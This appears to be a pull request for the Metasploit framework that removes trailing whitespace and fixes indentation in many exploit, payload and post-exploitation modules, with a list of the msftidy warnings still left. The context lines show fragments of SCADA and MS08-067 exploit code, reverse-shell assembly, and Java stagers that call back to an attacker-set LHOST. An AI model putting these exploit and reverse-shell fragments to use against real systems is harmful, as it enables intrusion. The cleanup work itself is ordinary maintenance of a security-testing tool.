--- a/modules/exploits/windows/scada/igss9_igssdataserver_rename.rb
+++ b/modules/exploits/windows/scada/igss9_igssdataserver_rename.rb
@@ -79,7 +79,7 @@ class Metasploit3 < Msf::Exploit::Remote
 				],
 			'Privileged'     => false,
 			'DisclosureDate' => "Mar 24 2011"))
-			
+
 			register_options(
 				[
 					Opt::RPORT(12401, false),

--- a/modules/exploits/windows/scada/igss9_misc.rb
+++ b/modules/exploits/windows/scada/igss9_misc.rb
@@ -55,7 +55,7 @@ class Metasploit3 < Msf::Exploit::Remote
 				],
 			'Privileged'     => false,
 			'DisclosureDate' => "Mar 24 2011"))
-			
+
 			register_options(
 				[
 					Opt::RPORT(0, false),

--- a/modules/exploits/windows/scada/realwin_scpc_initialize.rb
+++ b/modules/exploits/windows/scada/realwin_scpc_initialize.rb
@@ -67,7 +67,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		data << rand_text_alpha_upper(228)
 		data << generate_seh_payload(target.ret)
 		data << rand_text_alpha_upper(10024 - payload.encoded.length)
-		data << "\x00"	
+		data << "\x00"
 
 		print_status("Trying target #{target.name}...")
 		sock.put(data)

--- a/modules/exploits/windows/scada/realwin_scpc_initialize_rf.rb
+++ b/modules/exploits/windows/scada/realwin_scpc_initialize_rf.rb
@@ -67,7 +67,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		data << rand_text_alpha_upper(228)
 		data << generate_seh_payload(target.ret)
 		data << rand_text_alpha_upper(10024 - payload.encoded.length)
-		data << "\x00"	
+		data << "\x00"
 
 		print_status("Trying target #{target.name}...")
 		sock.put(data)

--- a/modules/exploits/windows/smb/ms08_067_netapi.rb
+++ b/modules/exploits/windows/smb/ms08_067_netapi.rb
@@ -656,7 +656,7 @@ class Metasploit3 < Msf::Exploit::Remote
 							'Scratch'   => 0x00020408
 						}
 					], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
-					
+
 					# Standard return-to-ESI without NX bypass
 					# Provided by Masashi Fujiwara
 					[ 'Windows 2003 SP2 Japanese (NO NX)',
@@ -1167,7 +1167,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			gadget3.unpack('V').first
 		]
 
-		
+
 		# convert the meta rop into concrete bytes
 		rvas = rvasets[version]
 

--- a/modules/payloads/singles/generic/custom.rb
+++ b/modules/payloads/singles/generic/custom.rb
@@ -30,7 +30,7 @@ module Metasploit3
 					'Payload' => "" # not really
 				}
 			))
-			
+
 		# Register options
 		register_options(
 			[

--- a/modules/payloads/singles/linux/x86/shell_reverse_tcp2.rb
+++ b/modules/payloads/singles/linux/x86/shell_reverse_tcp2.rb
@@ -56,14 +56,14 @@ module Metasploit3
 	int 80h                       ; @0000000c   cd80
 	xchg ebx, eax                 ; @0000000e   93
 	pop ecx                       ; @0000000f   59
-	
+
 	; Xrefs: 0000000f, 00000015
 xref_00000010_uuidfdbd8:
 	mov al, 3fh                   ; @00000010   b03f
 	int 80h                       ; @00000012   cd80
 	dec ecx                       ; @00000014   49
 	jns xref_00000010_uuidfdbd8   ; @00000015   79f9  -- to 10h
-	
+
 	; Xrefs: 00000015
 	pop ebx                       ; @00000017   5b
 	pop edx                       ; @00000018   5a

--- a/modules/payloads/stagers/java/reverse_http.rb
+++ b/modules/payloads/stagers/java/reverse_http.rb
@@ -51,7 +51,7 @@ module Metasploit3
 		c << "URL=http://#{datastore["LHOST"]}"
 		c << ":#{datastore["LPORT"]}" if datastore["LPORT"]
 		c << "/INITJM\n"
-		
+
 		c
 	end
 

--- a/modules/payloads/stagers/java/reverse_tcp.rb
+++ b/modules/payloads/stagers/java/reverse_tcp.rb
@@ -51,7 +51,7 @@ module Metasploit3
 		c << "Spawn=#{spawn}\n"
 		c << "LHOST=#{datastore["LHOST"]}\n" if datastore["LHOST"]
 		c << "LPORT=#{datastore["LPORT"]}\n" if datastore["LPORT"]
-		
+
 		c
 	end
 

--- a/modules/payloads/stagers/netware/reverse_tcp.rb
+++ b/modules/payloads/stagers/netware/reverse_tcp.rb
@@ -150,7 +150,7 @@ resolv_ptrs:
 
 reverse_connect:
 	xor ebx, ebx
-	
+
 	push ebp
 	mov ebp, esp
 	push ebp
@@ -161,7 +161,7 @@ reverse_connect:
 	mov esi, eax
 	test eax, eax
 	jz end
-	
+
 	push ebx
 	push ebx
 	push LHOST
@@ -175,11 +175,11 @@ reverse_connect:
 	call [edi-0x10]       // LIBC.NLM|bsd_connect_mp
 	cmp eax, -1
 	jz end
-	
+
 	push 65535
 	push edi
 	mov ecx, esp
-	
+
 	push ebx
 	push ebx
 	push ebx
@@ -190,13 +190,13 @@ reverse_connect:
 	push ebx
 	push ebx
 	mov ecx, esp
-	
+
 	push ebp
 	push ebx
 	push ecx
 	push esi
 	call [edi-0x14]       // LIBC.NLM|bsd_recvmsg_mp
-	
+
 	jmp edi
 
 end:

--- a/modules/payloads/stages/netware/shell.rb
+++ b/modules/payloads/stages/netware/shell.rb
@@ -266,7 +266,7 @@ end:
 	push ebp              ; rescode
 	push [edi-0x40]       ; socket
 	call [edi-0x34]       ; LIBC.NLM|bsd_close_mp
-	
+
 	; go back to the main kernel loop
 	call [edi-0x0C]       ; SERVER.NLM|kWorkerThread
 
@@ -339,7 +339,7 @@ send_screen:
 	push [edi+0x10]
 	call [edi-0x10]       ; SERVER.NLM|GetInputCursorPosition
 	add esp, 0x0c
-	
+
 	mov ebx, [esp+0x0c]
 	xor edx, edx
 	mov ecx, [edi+0x0c]
@@ -360,17 +360,17 @@ next_send:
 	push ecx
 	call send_data
 	add esp, 0x08
-	
+
 	cmp bx, word ptr[esi+2]
 	jae end_sl
-	
+
 	push 0x0000000a
 	mov eax, esp
 	push 1
 	push eax
 	call send_data
 	add esp, 0x0C
-	
+
 	inc ebx
 	add ecx, edx
 	cmp bx, word ptr[esi+2]
@@ -410,7 +410,7 @@ sendrecv_data:
 	push [ebp+0x20]         ; iov_len
 	push [ebp+0x1C]         ; iov_base
 	mov ecx, esp            ; msg_iov
-	
+
 	xor ebx, ebx            ; struct msghdr
 	push ebx                ; msg_flags
 	push ebx                ; msg_controllen
@@ -421,25 +421,25 @@ sendrecv_data:
 	push ecx                ; msg_iov
 	push ebx                ; msg_namelen
 	push ebx                ; msg_name
-	
+
 	mov ecx, esp            ; message
-	
+
 	sub esp, 4
 	mov edx, esp            ; rescode
-	
+
 	push edx                ; rescode
 	push 0                  ; flags
 	push ecx                ; message
 	push [ebp+0x18]         ; socket
 	call [ebp+0x14]         ; SERVER.NLM|bsd_recvmsg_mp
-	
+
 	mov esp, ebp
 	pop edx
 	pop ebx
 	pop ecx
 	pop ebp
 	ret
-	
+
 
 
 

--- a/modules/post/windows/gather/enum_domain_tokens.rb
+++ b/modules/post/windows/gather/enum_domain_tokens.rb
@@ -179,7 +179,7 @@ class Metasploit3 < Msf::Post
 			'Header'  => "Account in Local Groups with Domain Context",
 			'Indent'  => 1,
 			'Columns' =>
-			  [
+			[
 				"Group",
 				"Member",
 				"Domain Admin"
@@ -228,7 +228,7 @@ class Metasploit3 < Msf::Post
 			'Header'  => "Processes under Domain Context",
 			'Indent'  => 1,
 			'Columns' =>
-			  [
+			[
 				"Name",
 				"PID",
 				"Arch",

--- a/modules/post/windows/gather/enum_termserv.rb
+++ b/modules/post/windows/gather/enum_termserv.rb
@@ -66,7 +66,7 @@ class Metasploit3 < Msf::Post
 						print_good("#{hostval} is connected to as #{hostvalkey.query_value('UsernameHint').data}")
 					end
 				end
-                        rescue Rex::Post::Meterpreter::RequestError => e
+			rescue Rex::Post::Meterpreter::RequestError => e
 			end
 		end
 		unload_our_hives(userhives)


### PR DESCRIPTION
The only ones left were one 200 column one that I doubt has a solution, the File.open without binary mode and a couple carriage return EOL errors that I can't figure out.

$ ./tools/msftidy.rb modules/
modules/post/windows/gather/credentials/imvu.rb ... carriage return EOL: 94
modules/post/windows/recon/computer_browser_discovery.rb ... lines longer than 200 columns: 1
        95: "\t\tclient.railgun.add_function( 'netapi32', 'NetServerEnum', 'DWORD',[[\"PBLOB\",\"servername\",\"in\"],[\"DWORD\",\"level\",\"in\"],[\"PDWORD\",\"bufptr\",\"out\"],[\"DWORD\",\"prefmaxlen\",\"in\"],[\"PDWORD\",\"entriesread\",\"out\"],[\"PDWORD\",\"totalentries\",\"out\"],[\"DWORD\",\"servertype\",\"in\"],[\"PWCHAR\",\"domain\",\"in\"],[\"DWORD\",\"resume_handle\",\"inout\"]])\n"
modules/exploits/multi/handler.rb ... missing disclosure date
modules/exploits/windows/ftp/absolute_ftp_list_bof.rb ... carriage return EOL: 144
modules/exploits/windows/smtp/njstar_smtp_bof.rb ... carriage return EOL: 204
modules/auxiliary/analyze/jtr_mysql_fast.rb ... File.open without binary mode: 1
modules/auxiliary/analyze/jtr_linux.rb ... File.open without binary mode: 1
modules/auxiliary/analyze/jtr_mssql_fast.rb ... File.open without binary mode: 1
modules/auxiliary/analyze/jtr_oracle_fast.rb ... File.open without binary mode: 1
modules/auxiliary/analyze/postgres_md5_crack.rb ... File.open without binary mode: 2
modules/auxiliary/spoof/arp/arp_poisoning.rb ... lines longer than 200 columns: 1
       334: "\t\t(addr =~ /^(?:(?:25[0-5]|2[0-4][0-9]|[0-1]?[0-9]{1,2})[.](?:25[0-5]|2[0-4][0-9]|[0-1]?[0-9]{1,2})[.](?:25[0-5]|2[0-4][0-9]|[0-1]?[0-9]{1,2})[.](?:25[0-5]|2[0-4][0-9]|[0-1]?[0-9]{1,2}))$/) ? true : false\n"
modules/auxiliary/admin/vxworks/wdbrpc_memory_dump.rb ... File.open without binary mode: 1
